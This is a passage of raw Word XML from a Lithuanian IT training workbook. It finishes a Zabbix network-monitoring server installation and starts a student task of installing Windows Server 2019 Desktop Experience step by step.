        <w:t xml:space="preserve"> atveju tas URL būtų „http://192.168.1.161/zabbix“, nes serveryje įdi</w:t>
      </w:r>
      <w:r w:rsidR="3B0B144E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>egta</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> „Zabbix“, kurio</w:t>
      </w:r>
      <w:r w:rsidR="431B4B7F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP adresas</w:t>
      </w:r>
      <w:r w:rsidR="446F0450" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="51177ACC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">yra </w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>192.168.1.161 (savo serverio IP adresą galite rasti įvesdami komandą „ip a“) terminale).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767741B9" w14:textId="02AB82AB" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="7F3641C7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Iš esmės šiame </w:t>
      </w:r>
      <w:r w:rsidR="367B2AFB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pavyzdyje</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> reikia įvesti tik „Zabbix DB“ vartotojo slaptažodį, o </w:t>
      </w:r>
      <w:r w:rsidR="00A408AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>vėliau</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>tiesiog spustelė</w:t>
      </w:r>
      <w:r w:rsidR="2F7978FF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ti</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> „Kitas žingsnis“. </w:t>
      </w:r>
      <w:r w:rsidR="099285F1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Žemiau p</w:t>
      </w:r>
      <w:r w:rsidR="4E523C92" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>avyzdyje parodyta</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kaip</w:t>
      </w:r>
      <w:r w:rsidR="0024358D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="636196B1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">sukurti </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>duomenų bazės slaptažodį</w:t>
      </w:r>
      <w:r w:rsidR="0024358D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„zabbixDBpass“</w:t>
      </w:r>
      <w:r w:rsidR="5667078E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BE8858" w14:textId="6AA58A70" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="4A50BA65" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76D26662" wp14:editId="4A20D128">
            <wp:extent cx="3933825" cy="2371725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1323789777" name="Picture 132378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789777"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId212">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3933825" cy="2371725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD8D9FC" w14:textId="012A159F" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="00037E6B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. Zabbix tinkle būsenos stebėjimo serveris įdiegtas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31167CF8" w14:textId="0681B213" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="7F3641C7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Šaltinis: How to Install Zabbix 5.0 or 5.2 on CentOS 8 [Step-by-Step</w:t>
      </w:r>
      <w:r w:rsidR="37FC3B30" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">]. </w:t>
      </w:r>
      <w:r w:rsidR="37FC3B30" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Best monitoring tools</w:t>
      </w:r>
      <w:r w:rsidR="37FC3B30" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="37FC3B30" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId213">
        <w:r w:rsidR="37FC3B30" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://bestmonitoringtools.com/how-to-install-zabbix-server-on-centos-or-rhel/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="29A13DBF" w14:textId="098148FC" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="007D6C3C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23296F73" w14:textId="77777777" w:rsidR="00E643C6" w:rsidRPr="005A5C28" w:rsidRDefault="00E643C6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">8 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ĮDIEGTI IR KONFIGŪRUOTI WINDOWS SERVER 2019 DESKTOP EXPERIENCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C16CFF6" w14:textId="310BD7C4" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">LAUKIAMI </w:t>
      </w:r>
      <w:r w:rsidR="00AB2CF0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>REZULTATAI</w:t>
      </w:r>
      <w:r w:rsidR="1881C3D6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="1881C3D6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB2CF0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="1881C3D6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>okinys turi pateikti įdiegto WINDOWS SERVER 2019 DESKTOP EXPERIENCE</w:t>
      </w:r>
      <w:r w:rsidR="00A408AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ekrano vaizdą</w:t>
      </w:r>
      <w:r w:rsidR="1881C3D6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBEF0BB" w14:textId="6372DDB2" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="00AB2CF0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Darbo eiga:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53337C0A" w14:textId="3EB295AC" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1881C3D6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1. Paleisdami iš „Windows“ DVD, USB ar ISO vaizdo fail</w:t>
      </w:r>
      <w:r w:rsidR="00A408AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, paspauskite bet kurį mygtuką, kad pradėtumėte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635F0547" w14:textId="29710BBC" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1881C3D6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2. Įkeliami failai</w:t>
      </w:r>
      <w:r w:rsidR="00AB2CF0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (palaukite)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484D30A2" w14:textId="4930F9C0" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1881C3D6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Pasirinkite kalbą (regioną) ir spustelėkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„Kitas“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530D6761" w14:textId="3E83DC7D" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1881C3D6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Spustelėkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„Įdiegti dabar“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C996542" w14:textId="17917E89" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1881C3D6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>5. Įveskite produkto raktą ir spustelėkite „</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Kitas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0790E06B" w14:textId="2DB29BEA" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1881C3D6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>6. Norėdami vėliau įvesti produkto kodą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">spustelėkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„Neturiu produkto kodo“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A33BFB" w14:textId="0E085B75" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1881C3D6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Sąraše pasirinkite tinkamą („Desktop Experience“) „Windows Server 2019“ versiją ir spustelėkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„Kitas“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A310373" w14:textId="04CD7480" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1881C3D6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>8. Atidžiai perskaitykite ir, jei sutinkate su visomis taisyklėmis ir nuostatomis ir norite tęsti nauj</w:t>
      </w:r>
      <w:r w:rsidR="474981DA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">nimo procesą, spustelėkite žymimąjį laukelį </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„Aš sutinku su licencijos sąlygomis“</w:t>
      </w:r>
      <w:r w:rsidR="00AB2CF0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">atvirtinkite žymėjimą ir spustelėkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„Kitas“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D7859A" w14:textId="4C43D43A" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1881C3D6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Spustelėkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„Pasirinktinis: įdiekite tik„ Windows “(išplėstinė)“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FA136F" w14:textId="6A35FD90" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1881C3D6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">10. Norėdami sukurti disko skaidinį, spustelėkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„Naujas“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18080F64" w14:textId="16E2B696" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1881C3D6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">11. Nurodykite dydį, spustelėkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„Taikyti“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3372823E" w14:textId="4106E87C" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1881C3D6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">12. Spustelėkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„Gerai“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D0D68E" w14:textId="73DCA9EC" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1881C3D6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>13. Pasirinkite norimą įdiegti skaidinį ir spustelėkite „</w:t>
      </w:r>
      <w:r w:rsidR="004F4A9F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Kitas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8C7B92" w14:textId="06935709" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1881C3D6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>14. Palaukite, kol sistema vėl palei</w:t>
      </w:r>
      <w:r w:rsidR="1357BED9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iš naujo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9CC3D8" w14:textId="5519685F" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="1881C3D6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
